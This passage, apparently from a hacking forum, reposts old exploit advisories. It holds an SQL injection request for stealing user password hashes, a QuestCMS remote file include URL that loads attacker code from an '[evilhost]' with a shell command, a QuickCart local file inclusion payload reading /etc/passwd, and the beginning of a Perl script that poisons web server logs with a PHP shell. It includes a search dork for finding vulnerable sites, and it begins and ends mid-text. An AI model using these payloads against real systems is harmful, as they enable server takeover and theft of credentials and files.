content. Consequently, if you perform a search request with only a keyword and no author f.e., an attacker is thus able to populate $keyword_results and then $search_ids indexes with any possible content coming from $result_list. Finally, the $search_ids array is imploded and put in the SQL query without any protection. In a word, there is an SQL injection here. 3) Exploitation With an adequate UNION query in the $result_list array, an attacker is able to perform blind SQL injections and f.e. retrieve the entire hash of any user just by looking if the script returned some results for his malicious search. For example, you can send the following request : search.php?action=search&keywords=hello&author=&forum=-1 &search_in=all&sort_by=0&sort_dir=DESC&show_as=topics&search=1 &result_list[< UNION SQL QUERY > sexyvirus(HCE) QuestCMS (main.php) Remote File Include Vulnerability Code: !!!!!!!!!WWW.SÝBERSAVASCÝLAR.COM!!!!!!!!! Title : Questcms Remote File Include Vulnerability #Author: Crackers_Child #cont@ct: crackers_child@sibersavascilar.com Affected software description : Application : Questwork Web Content Management system (QuestCMS) URL : http://www.questwork.com dork : allinurl:"/questcms/" Exploit : Usage: http://[target]/[questcms_path]/main/main.php?pi=http://[evilhost]/cmd.txt?&cmd= ls greets: X_ALPREN_X,Root_Mor and My Other Friends [ WWW.SÝBERSAVASCÝLAR.COM ] # milw0rm.com [2006-08-07] vns3curity(HCE) QuickCart 2.0 (categories.php) Local File Inclusion Exploit Code: ################################################################## ############################### # r0ut3r Presents # # # # Another r0ut3r discovery! # # writ3r [at] gmail.com # # # # QuickCart 2.0 Local File Inclusion Exploit # ################################################################## ############################### # Software: QuickCart 2.0 # # # # Vendor: http://opensolution.org/ # # # # Released: 2006/12/03 # # # # Critical: Moderately crtical # # # # Discovered & Exploit By: r0ut3r (writ3r [at] gmail.com) # # # # Note: The information provided in this document is for Quick Cart administrator # # testing purposes only! # # # # register_globals must be on # # gpc_magic_quotes must be off # # # # actions_admin/categories.php?config[db_type]= # # actions_admin/couriers.php?config[db_type]= # # actions_admin/orders.php?config[db_type]= # # actions_admin/products.php?config[db_type]= # # actions_client/products.php?config[db_type]= # # actions_client/orders.php?config[db_type]= # # # # Vulnerable code: # # require_once DIR_CORE.'couriers-'.$config['db_type'].'.php'; # # # # Patch: (Place this code at the top of every file) # # if(basename(__FILE__) == basename($_SERVER['PHP_SELF'])) # # die(); # # # # Exploit: categories.php?config[db_type]= / / / / / / / / / / /etc/passwd%00 # # Usage: perl localfilexpl.pl 127.0.0.1 actions_admin/categories.php?config[db_type]= # ################################################################## ############################### ################################################################## ########## # Local File Inclusion Exploiter # # # # This script attempts to exploit a local file include vulnerability # # by finding a readable http log file, then by sending a specially crafted # # http request to the server in order to insert a PHP Shell into the # # log files. A shell is then spawned. # # # # Created By r0ut3r (writ3r [at] gmail.com) # ################################################################## ########## use IO::Socket; use Switch; $port = "80"; # connection port $target = @ARGV[0]; # localhost $vulnf = @ARGV[1]; # /include/WBmap.php?l= $opt = @ARGV[2]; # -p (not needed) sub Header() { print q {Local File Inclusion Exploiter - By r0ut3r (writ3r [at] gmail.com) }; } sub Usage() { print q {Usage: localfilexpl.pl [target] [folder & vulnerable file] [opt] Example: localfilexpl.pl localhost /include/WBmap.php?l= -p opt = -p (To print recieved content) }; exit(); } Header(); if (!$target || !$vulnf) { Usage(); } @targets = ( "var/log/httpd/access_log", "var/log/httpd/error_log", "var/log/access_log", "var/log/error_log", "var/www/logs/access.log", "var/www/logs/access_log", "var/www/logs/error_log", "var/www/logs/error.log", "apache/logs/access_log", "apache/logs/error.log", "etc/httpd/logs/access.log", "etc/httpd/logs/access_log", "etc/httpd/logs/error.log", "etc/httpd/logs/error_log", "usr/local/apache/logs/access.log", "usr/local/apache/logs/access_log", "usr/local/apache/logs/error.log", "usr/local/apache/logs/error_log", "var/log/apache2/error_log", "var/log/apache2/error.log", "var/log/apache2/access_log", "var/log/apache2/access.log", "access_log", );